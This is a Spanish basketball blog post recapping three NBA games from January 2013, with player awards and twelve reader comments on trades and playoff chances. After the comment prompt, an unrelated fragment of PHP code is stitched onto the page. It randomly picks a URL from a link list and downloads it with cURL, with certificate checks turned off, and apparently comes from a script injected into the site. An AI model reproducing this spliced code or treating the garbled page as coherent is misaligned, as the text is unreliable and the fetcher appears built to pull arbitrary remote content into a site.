La Crónica: Nuevos galones

11 de January de 2013 por Viva_Dirk

Los 3 partidos de ayer nos dejaron duelos extremadamente igualados, donde aparecieron como primeras espadas jugadores que por un motivo u otro están siendo los mejores de su equipo esta temporada.

En Indiana, los Pacers se llevaron el partido frente a unos Knicks que sin Carmelo ni Felton y con Amare aún por recuperar pierden gran parte de su capacidad anotadora. Partido completísimo de Paul George al que la lesión de Danny Granger ha catapultado hacia el All-Star y a ser considerado uno de los mejores aleros de la liga, pero solo estuvo acompañado por Mahinmi y, en menor medida, por Stephenson. En los Knicks, JR Smith se fue hasta los 29 tiros casi por obligación y Tyson Chandler cumplió con su trabajo (76-81).

OJ Mayo fue el líder de los Mavs en Sacramento en un partido que se fue hasta la prórroga tras remontar los Mavs 10 puntos en el último cuarto. Al escolta lo secundaron Shawn Marion y Vince Carter desde el banco, y ya se va viendo una versión menor de Nowitzki. Por los Kings el amigo Cousins sigue en ‘modo numeracos’, pero se fue a la calle en la prórroga por faltas y los esfuerzos de Isaiah Thomas y Tyreke Evans como 6º hombre no fueron suficientes (117-112). 

La gran sorpresa llegó desde Portland donde los campeones sucumbieron ante el quinteto de los Blazers por 90-92. Decimos el quinteto porque los suplentes aportaron 8 puntos. El partidazo de Batum ante Lebron, la habitual correcta actuación de LaMarcus, la pelea de Hickson y la sólida aportación del juego exterior les llegó para tumbar a unos Heat en los que Bosh fue el máximo anotador y Lebron rozó el triple doble ‘menor’. Ray Allen no pudo compensar un partido flojo de Wade.

PREMIOS

MVP: Los nominados son Paul George con 24 puntos, 11 rebotes, 5 asistencias y 6 robos, OJ Mayo con 24 puntos, 10 rebotes, 5 asistencias y 8 de 15 en tiros y Nico Batum con 28 puntos 7 rebotes, 5 asistencias y 8 de 15 en tiros. Hacerlo frente a Lebron y ganar a los Heat le da el premio al francés.

Rookie: Damian Lillard sumó 10 puntos y 8 asistencias a la victoria de su equipo y Thomas Robinson cogió 10 rebotes en 12 minutos.

Sorpresa: Ver a Lebron James anotar sólo 15 puntos no es algo habitual pero tampoco podemos decir que nos haya decepcionado. De esta manera se rompe una racha de 33 partidos consecutivos anotando 20 o más puntos.

Decepción: Jason Kidd no encontró su sitio sin gente a la que repartir asistencias y se quedó en 3 de 10 en tiros con 5 pérdidas.

Esfuerzo en vano: JR Smith anotó 25 puntos y repartió 6 asistencias y Chris Bosh se fue a 29 puntos y 4 tapones con una excepcional serie de tiro. Premio para DeMarcus Cousins, que cuando está pendiente únicamente de jugar al baloncesto puede anotar 29 puntos, coger 9 rebotes, dar 4 asistencias, perder 5 balones y cometer 6 faltas ¡¡Estuvo en todas!!

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Haya con Y griega, en la frase sobre la sorpresa del día, LeBron 😀 seguro de que se debe al entusiasmo de que hayan ganado los Mavs y Dirk vaya cogiendo ritmo.

    Paul George increíble, no sé como no han traspasado ya a Danny Granger por un escolta tirador que abra la cancha y algo más en la posición de base, pudiendo hacer una buena rotación de 3 tíos con Hill y esos dos jugadores que obtuvieran, y con Stephenson o Gerald Green para ciertos minutos.

      Citar

  2. txusma dice:
    #2

    Corregido José Luis. Gracias por el aviso!

      Citar

  3. GreenPride dice:
    #3

    Indiana ha recuperado el ritmo ganador a tiempo y si traspasaran a Granger por un 2 en condiciones podrían ser temibles en lo que queda de temporada. Los Knicks con muchas bajas están pasando un momento complicado y ven amenazada ya su segunda plaza del Este.
    Por encima de estos dos en el Este, los Heat viven también una época difícil con su Big Three quedándose sorprendentemente sólo partido tras partido, lo que les está costando muchas derrotas más de las que cabía esperar. Siguen de favoritos en todas las apuestas pero quizá algunos estén empezando a dudar. Yo creo que reaccionarán a no tardar mucho.
    Muy interesante la situación en el Este con muchos sube-bajas entre los equipos

      Citar

  4. Lucho dice:
    #4

    Me parece o los Mavs cortaron la racha de prorrogas perdidas? Llevaban 10 creo

      Citar

  5. Esteban dice:
    #5

    la lesion de granger al comienzo de temporada olia a desastre y a fracaso rotundo de los pacers, pero en cambio a resultado una joya, pues han puesto a george de alero, (cosa que he reclamdo a gritos desde su año rookie) y le han dado las riendas del equipo y vaya si responde, hoy no hay dudas de que debe ser el 3

    granger? podria ser un arma letal desde el banco e este equiopo, o aprender a jugar de escolta, lo que esta claro es que no recuperara su puesto de alero

    un trade interesante seria por marcus thorton, sin demasiado lugar en los kings. LOs pacers necesitan un hacedor de jugadas, alguien que encuentre su propio tiro y por los 8 millones de thorton creo que es el incado, martin y ellis son mejores pero a la vez mas caro y los pacers tiene mucho diner comprometido enhibbert, hill, mahimi, green y estan pendientes las renovaciones de tyler y el propio george

      Citar

  6. Viva_Dirk dice:
    #6

    @GreenPride: Hace siglos que me pregunto porque los Kings tienen a Marcus Thornton y los Pacers a Granger, cuando ambos tienen detrás jugadores a los que deberian dar todo el protagonismo en sus franquicias.

      Citar

  7. Esteban dice:
    #7

    mucho cuidado con los PO del este, todo parece encaminado a que los knicks y el heat seran los finalistas pero OJO

    Los bulls y los pacers funcionan y ganan juegos a la espera nada menos que del ex MVP derrick ROSE y los pacers de su maximo anotador de los ultimos 5 años GRANGER, por lo que se supone que cuando ellos vuelvan, mejoraran y esto los acercara mucho a los knicks y al heat, sobretodo por que estos dos ultimos no vienen tan bien como parece, NYK es una enfermeria constante y no de sus veteranos, hasta los jovenes como felton y carmelo faltan juegos, mientras que el HEAT empiaza a notar que jugar sin internos (bosh es un 3/4 mas que un 5) a lo largo de toda una temporada no es facil y varios equipos lo estan aprovechando

    esto dejaria como los peores clasificados del este nada mas y nada menos que a Atlanta, Nets y Celtics, por lo que a diferencia de otros muchos años, los calsificados 1, 2 y 3 del este tendran una primera serie de PO muy muy interesante, al estilo el OESTE

      Citar

  8. GreenPride dice:
    #8

    A dia d hoy parecen mas parejos los PO en el Este q en el Oeste para primera ronda pero queda un mundo d temporada todavía

      Citar

  9. Esteban dice:
    #9

    El este va a estallar en PO!! No veo barridas ni series faciles como nos tenian acostumbrados desde hace años

    Hay 7 equipos en el este muy muy parejos, yo veo a los bucks detras de los otros 7

    Interesante seria ver a los 76ers con bynum! Eso si q molaria

      Citar

  10. Jose Luis dice:
    #10

    Denise estará feliz 😀

    Partidazo de Afflalo y todo el quinteto Magic.

      Citar

  11. rumbero dice:
    #11

    Tremendo Afflalo. Lo ha metido casi todo
    Y en Philadelphia estaran pensando como les hubiera ido la temporada sin el bolero y con Vucevic. Buenisima su temporada hasta el momento

      Citar

  12. Denise dice:
    #12

    Jose Luis:
    Denise estará feliz

    Partidazo de Afflalo y todo el quinteto Magic.

    jaja, si pero no lo he podido ver.

    Que pena la racha de 10 derrotas consecutivas con 7-8 partidos perdiendo por menos de 6 puntos, si hubieran ganado la mitad de ellos, estarían luchando por la octava plaza de Playoffs, de todas formas, y a pesar del balance 13-23, para mi los Magic están haciendo un temporadón. Recuerden que están jugando sin Glen Davis, Harrington y Turkoglu (el turco está acabado) y aun así dan la cara en todos los partidos. Y como dato, de todas las estrellas traspasadas en el trade a 4 bandas de Howard, al final los que mas producción están teniendo son Afflalo y Vucevic.
    Lo que deben intentar ahora es empaquetar a Turkoglu o Harrington traspasandolo junto con Redick, el cual es expiring y parece que no va a renovar. “Me gusta ganar” fueron sus palabras despues de que le preguntaran si iba a renovar por Orlando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>